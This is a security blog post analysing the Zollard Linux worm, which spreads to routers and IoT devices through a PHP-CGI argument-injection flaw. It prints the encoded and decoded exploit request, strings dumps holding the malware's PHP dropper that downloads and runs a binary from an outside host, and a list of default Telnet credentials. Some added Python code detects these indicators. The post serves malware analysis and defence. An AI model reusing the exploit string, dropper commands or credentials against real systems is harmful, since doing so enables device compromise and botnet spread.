Tuesday, December 3, 2013

Hey Zollard, leave my Internet of Things alone!

We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts, so Symantec's recent report about Linux.Darlloz targeting "The Internet of Things" was of particular interest.

Recently I noted an inbound PHP exploit attempt from 78.39.232.113 (Telecommunication Company of Kordestan, Iran).

PHP exploit attempt from 78.39.232.113
The decoded POST is:

-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n

Note the User-Agent: Zollard and the references to the files that will be fetched and executed upon successful compromise. The file names indicate several architectures: arm, ppc, mips, mipsel, and x86.
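As an added example (not code from the original post), the following parses an access-log line of the kind shown in the comments below, decodes the php-cgi query string, and flags the injected php.ini directives; the log line and its 203.0.113.5 source address are constructed for the demo.

```python
# Added example (not from the original post): decode the php-cgi request line
# from a web server access log and flag the "-d" directive injection that the
# Zollard POST uses. The sample log line below is constructed in combined log
# format; the source address is a documentation address, not a real attacker.
import re
from urllib.parse import unquote_plus

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
                    r'(?P<status>\d+) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# php.ini directives that, pushed in through the query string, make the request
# body execute as PHP (auto_prepend_file=php://input with allow_url_include=on)
# or strip the limits that would otherwise contain it.
DANGEROUS_DIRECTIVES = {'allow_url_include', 'auto_prepend_file', 'disable_functions',
                        'safe_mode', 'open_basedir', 'suhosin.simulation', 'cgi.force_redirect'}

def fully_decode(s, max_rounds=3):
    """Percent-decode until stable: the post's own 'decoded' POST still held %6F and %2E."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s

def injected_directives(query):
    """Return the php.ini directive names set via '-d name=value' in a decoded query."""
    return {m.group(1) for m in re.finditer(r'(?:^|\s)-d\s+([A-Za-z0-9_.]+)=', query)}

def analyse_log_line(line):
    """Parse one access-log line; None if it is not in combined log format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, raw_query = m.group('target').partition('?')
    query = fully_decode(raw_query)
    hits = injected_directives(query) & DANGEROUS_DIRECTIVES
    php_cgi = path.startswith('/cgi-bin/php')
    return {'src_ip': m.group('ip'), 'path': path, 'decoded_query': query,
            'injected': sorted(hits), 'zollard_ua': m.group('ua') == 'Zollard',
            'suspicious': php_cgi and bool(hits)}

# Constructed sample: the same /cgi-bin/php4 target and Zollard user agent seen in the wild.
SAMPLE_LOG = ('203.0.113.5 - - [30/Dec/2013:06:33:02 -0500] "POST /cgi-bin/php4?'
              '%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+'
              '%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+'
              '%2D%6E HTTP/1.1" 444 0 "-" "Zollard" "-"')
```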

All files were fetched, and the x86 file was sandboxed on a Linux VM. Immediately the VM began incrementally scanning 117.201.0.0/18 for hosts with destination port 58455 open. The Linux malware also opened a listener on my VM's port 58455.

Compromised host listening on port 58455

Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies, including 0x010005, 0x01010006, or 0x01020006.

Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58445. Examining the strings of the malware files shows several usernames that are attempted, including "root" and "admin".
Weak or non-existent passwords allow a successful Telnet login, with examples below:
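An added example (not part of the original post) that turns the sweep, probe, reply and Telnet sequence described above into detection logic over connection records; the record layout (one record per connection, first payload bytes in each direction as hex) and the sample records are assumptions, not a real sensor format.

```python
# Added example (not from the original post): pick out the peer-discovery
# sequence from connection records: a host sweeping tcp/58455, the 0x00020015
# probe answered with one of the replies quoted in the post, then a telnet
# (tcp/23) attempt from the same scanner to the same peer. The record layout
# and the records themselves are constructed for the demo.

PEER_PORT = 58455
PROBE = '00020015'
KNOWN_REPLIES = ('010005', '01010006', '01020006')   # values quoted in the post

def is_peer_handshake(rec):
    """True if the connection carried the probe and a recognised reply."""
    return (rec['dport'] == PEER_PORT
            and rec['c2s'].lower().startswith(PROBE)
            and any(rec['s2c'].lower().startswith(k) for k in KNOWN_REPLIES))

def find_zollard_activity(records, sweep_threshold=3):
    """Return sweeping hosts, completed handshakes and telnet follow-ups (records in time order)."""
    targets_by_src = {}
    handshakes = set()
    telnet_followups = []
    for rec in records:
        if rec['dport'] == PEER_PORT:
            targets_by_src.setdefault(rec['src'], set()).add(rec['dst'])
            if is_peer_handshake(rec):
                handshakes.add((rec['src'], rec['dst']))
        elif rec['dport'] == 23 and (rec['src'], rec['dst']) in handshakes:
            telnet_followups.append((rec['src'], rec['dst']))
    scanners = {src: len(dsts) for src, dsts in targets_by_src.items() if len(dsts) >= sweep_threshold}
    return {'scanners': scanners, 'handshakes': sorted(handshakes), 'telnet_followups': telnet_followups}

# Constructed records: 198.51.100.7 sweeps part of 117.201.0.0/18, gets a reply
# from one host, then telnets to it; the last record is an unrelated telnet.
SAMPLE_RECORDS = [
    {'src': '198.51.100.7', 'dst': '117.201.0.1', 'dport': 58455, 'c2s': '', 's2c': ''},
    {'src': '198.51.100.7', 'dst': '117.201.0.2', 'dport': 58455, 'c2s': '', 's2c': ''},
    {'src': '198.51.100.7', 'dst': '117.201.0.3', 'dport': 58455, 'c2s': '00020015', 's2c': '01010006'},
    {'src': '198.51.100.7', 'dst': '117.201.0.3', 'dport': 23, 'c2s': '', 's2c': ''},
    {'src': '198.51.100.9', 'dst': '117.201.0.3', 'dport': 23, 'c2s': '', 's2c': ''},
]
```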


Example of Telnet session to a BusyBox device

Example of Telnet session to ARM architecture device

As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched.  You may find it of interest to see a strings dump of each of the files:


/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/0.run
/var/1.run
/var/idhash
/var/response
/var/challenge
/var/b.arm_v5t
/var/b.arm_v6k
/var/f.arm_v5t
/var/f-t2.arm_v6k
/var/f-t2.mips
/var/f-t2.mipsel
/var/sp.arm_v5t
/var/sp.arm_v6k
/var/t2.arm_v6k
/var/readme
/var/b/b3.arm_v5t
/var/b/b3.arm_v6k
/var/b/b3.mips
/var/b/b3.ramips
/var/b/b3.rtl
/var/b/readme
/var/b/0.run
/var/b/1.run
/var/b/idhash
/dav/0.run
/dav/1.run
/dav/b3.arm_v5t
/dav/b3.arm_v6k
/dav/b3.mips
/dav/b3.rtl
/dav/idhash
/dav/readme
/var/b
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment

Strings from 'arm' file

Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
nodes
/bin/sh
GET / HTTP/1.1
Host:
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
root
1234
12345
dreambox
smcadmin
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment
Strings from 'x86' file
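Added example (not from the original post or the malware): a host triage check built from the indicators visible in the strings dumps, the run-time paths, the iptables rule that drops inbound Telnet, and the peer listener on tcp/58455; the sample ss and iptables output and the demo directory tree are constructed.

```python
# Added example (not from the original post): host triage for the indicators
# the strings dumps show. The command-output checks take captured text so they
# also work on a saved triage bundle; the sample outputs and the demo
# directory tree are constructed.
import os
import re
import tempfile

INDICATOR_PATHS = ['/tmp/x86', '/var/run/.zollard', '/var/run/.lightpid', '/var/run/.aidrapid',
                   '/var/run/.lightscan', '/var/tmp/dreams.install.sh', '/usr/bin/-wget']
PEER_PORT = 58455

def present_indicator_paths(root='/'):
    """Return the indicator paths that exist under root (root may be a mounted image)."""
    return [p for p in INDICATOR_PATHS if os.path.lexists(os.path.join(root, p.lstrip('/')))]

def listening_ports(ss_output):
    """Parse `ss -ltn` text and return the set of local TCP ports in LISTEN state."""
    ports = set()
    for line in ss_output.splitlines():
        m = re.match(r'LISTEN\s+\d+\s+\d+\s+\S+:(\d+)\s', line)
        if m:
            ports.add(int(m.group(1)))
    return ports

def telnet_drop_rule_present(iptables_output):
    """True if `iptables -S INPUT` text holds the bot's rule: -A INPUT -p tcp --dport 23 -j DROP."""
    return any(re.search(r'-A INPUT\s+-p tcp\s+(?:-m tcp\s+)?--dport 23\s+-j DROP', line)
               for line in iptables_output.splitlines())

def triage(root='/', ss_output='', iptables_output=''):
    """Combine the three checks into one verdict for a host."""
    paths = present_indicator_paths(root)
    listener = PEER_PORT in listening_ports(ss_output)
    telnet_rule = telnet_drop_rule_present(iptables_output)
    return {'paths': paths, 'peer_listener': listener, 'telnet_drop_rule': telnet_rule,
            'infected_likely': bool(paths) or (listener and telnet_rule)}

def build_demo_tree():
    """Constructed tree with two of the indicators, so the path check can be exercised offline."""
    root = tempfile.mkdtemp(prefix='zollard-demo-')
    os.makedirs(os.path.join(root, 'var/run/.zollard'))
    os.makedirs(os.path.join(root, 'usr/bin'))
    open(os.path.join(root, 'usr/bin/-wget'), 'w').close()
    return root

# Constructed sample outputs in the layout ss -ltn and iptables -S actually print.
SAMPLE_SS = ('State  Recv-Q Send-Q Local Address:Port Peer Address:Port\n'
             'LISTEN 0      128    0.0.0.0:22         0.0.0.0:*\n'
             'LISTEN 0      5      0.0.0.0:58455      0.0.0.0:*\n')
SAMPLE_IPTABLES = '-P INPUT ACCEPT\n-A INPUT -p tcp -m tcp --dport 23 -j DROP\n'
```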

So who is "Zollard"?  What is the relationship between the scanned targets and the original scanner?
There is a good deal more research to be done on this malware, as well as on the hosting infrastructure supporting these exploit attempts. At this point, we believe that the malware hosting location is a compromised host and is not part of this campaign.

We recommend blocking IP address 78.39.232.113 and ensuring that all Internet-facing devices (yes, "devices") are strongly secured.

2 comments:

  1. I got something similar. Different source IP though:

    14.136.48.11 - - [30/Dec/2013:06:33:02 -0500] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 444 0 "-" "Zollard" "-"

  2. The post part (I've received the same string) resolves to:
    ?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
